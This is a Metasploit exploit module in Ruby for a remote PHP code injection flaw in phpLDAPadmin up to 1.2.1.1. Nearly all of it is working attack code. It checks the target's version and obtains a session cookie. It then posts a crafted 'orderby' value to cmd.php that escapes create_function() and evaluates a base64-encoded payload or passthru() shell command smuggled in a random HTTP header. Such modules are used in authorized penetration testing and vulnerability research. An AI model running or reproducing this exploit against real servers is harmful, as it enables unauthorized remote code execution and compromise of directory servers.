## # $Id: phpldapadmin_query_engine.rb 14062 2011-10-25 16:19:55Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection', 'Description' => %q{ This module exploits a vulnerability in the lib/functions.php that allows attackers input parsed directly to the create_function() php function. A patch was issued that uses a whitelist regex expression to check the user supplied input before being parsed to the create_function() call. }, 'Author' => [ 'EgiX ', # original discovery/poc 'mr_me ', # msf 'TecR0c ', # msf ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 14062 $', 'References' => [ ['BID', '50331'], ['URL', 'http://sourceforge.net/support/tracker.php?aid=3417184'], ['URL', 'http://www.exploit-db.com/exploits/18021/'], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 4000, 'Keys' => ['php'], }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Oct 24 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [true, "phpLDAPadmin directory path", "/phpldapadmin/htdocs/"]), ], self.class) end def check uri = '' uri << datastore['URI'] uri << '/' if uri[-1,1] != '/' uri << 'index.php' res = send_request_raw( { 'method' => 'GET', 'uri' => uri, }, 3) if (res and res.body =~ /phpLDAPadmin \(1\.2\.[0|1]\.\d/i) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def get_session uri = '' uri << datastore['URI'] uri << '/' if uri[-1,1] != '/' uri << 'index.php' res = send_request_raw( { 'method' => 'GET', 'uri' => uri, }, 3) if (res.nil? or not res.headers['Set-Cookie']) print_error("Could not generate a valid session") return end return res.headers['Set-Cookie'] end def cleanup # We may not be using php/exe again, so clear the CMD option if datastore['CMD'] datastore['CMD'] = nil end end def exploit # if we are using the exec CMD stager # important to check which php functions are disabled if datastore['CMD'] p = "passthru(\"%s\");" % datastore['CMD'] p = Rex::Text.encode_base64(p) else p = Rex::Text.encode_base64(payload.encoded) end # Generate some random strings hidden_header = rand_text_alpha_upper(6) fake_func_name = rand_text_alpha_upper(2) # build sttack string php_code = "#{fake_func_name}));}}error_reporting(0);eval(base64_decode(\$_SERVER[HTTP_#{hidden_header}]));die;/*" data = "cmd=query_engine&query=none&search=1&orderby=#{php_code}\r\n\r\n" session = get_session uri = '' uri << datastore['URI'] uri << '/' if uri[-1,1] != '/' uri << 'cmd.php' res = send_request_cgi( { 'method' => 'POST', 'uri' => uri, 'data' => data, 'headers' => { "#{hidden_header}" => p, 'Cookie' => session, 'Connection' => 'Close', }, }, 3) print_status("%s" % res.body) if datastore['CMD'] end end